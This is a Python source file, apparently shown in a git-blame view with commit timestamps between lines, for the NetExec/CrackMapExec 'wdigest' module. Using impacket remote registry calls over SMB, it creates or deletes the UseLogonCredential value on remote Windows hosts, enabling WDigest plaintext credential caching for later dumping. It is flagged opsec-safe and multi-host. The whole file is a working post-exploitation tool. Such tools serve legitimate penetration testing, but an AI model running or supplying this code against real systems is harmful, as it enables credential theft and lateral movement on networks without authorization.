NetExec/cme/modules/wdigest.py

92 lines
3.3 KiB
Python
Raw Normal View History

2017-03-27 21:09:36 +00:00
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5 import rrp
from impacket.examples.secretsdump import RemoteOperations
from sys import exit
class CMEModule:
name = 'wdigest'
description = "Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1"
supported_protocols = ['smb']
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
'''
ACTION Create/Delete the registry key (choices: enable, disable)
'''
if not 'ACTION' in module_options:
context.log.error('ACTION option not specified!')
exit(1)
if module_options['ACTION'].lower() not in ['enable', 'disable']:
context.log.error('Invalid value for ACTION option!')
exit(1)
self.action = module_options['ACTION'].lower()
def on_admin_login(self, context, connection):
if self.action == 'enable':
self.wdigest_enable(context, connection.conn)
elif self.action == 'disable':
self.wdigest_disable(context, connection.conn)
def wdigest_enable(self, context, smbconnection):
remoteOps = RemoteOperations(smbconnection, False)
remoteOps.enableRegistry()
2017-04-03 15:25:05 +00:00
if remoteOps._RemoteOperations__rrp:
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
2017-03-27 21:09:36 +00:00
regHandle = ans['phKey']
2017-04-03 15:25:05 +00:00
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
2017-03-27 21:09:36 +00:00
keyHandle = ans['phkResult']
2017-04-03 15:25:05 +00:00
rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, 1)
2017-03-27 21:09:36 +00:00
2017-04-03 15:25:05 +00:00
rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00')
2017-03-27 21:09:36 +00:00
if int(data) == 1:
context.log.success('UseLogonCredential registry key created successfully')
try:
remoteOps.finish()
except:
pass
def wdigest_disable(self, context, smbconnection):
remoteOps = RemoteOperations(smbconnection, False)
remoteOps.enableRegistry()
2017-04-03 15:25:05 +00:00
if remoteOps._RemoteOperations__rrp:
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
2017-03-27 21:09:36 +00:00
regHandle = ans['phKey']
2017-04-03 15:25:05 +00:00
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
2017-03-27 21:09:36 +00:00
keyHandle = ans['phkResult']
try:
2017-04-03 15:25:05 +00:00
rrp.hBaseRegDeleteValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00')
2017-03-27 21:09:36 +00:00
except:
context.log.success('UseLogonCredential registry key not present')
try:
remoteOps.finish()
except:
pass
return
try:
#Check to make sure the reg key is actually deleted
2017-04-03 15:25:05 +00:00
rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00')
2017-03-27 21:09:36 +00:00
except DCERPCException:
context.log.success('UseLogonCredential registry key deleted successfully')
try:
remoteOps.finish()
except:
pass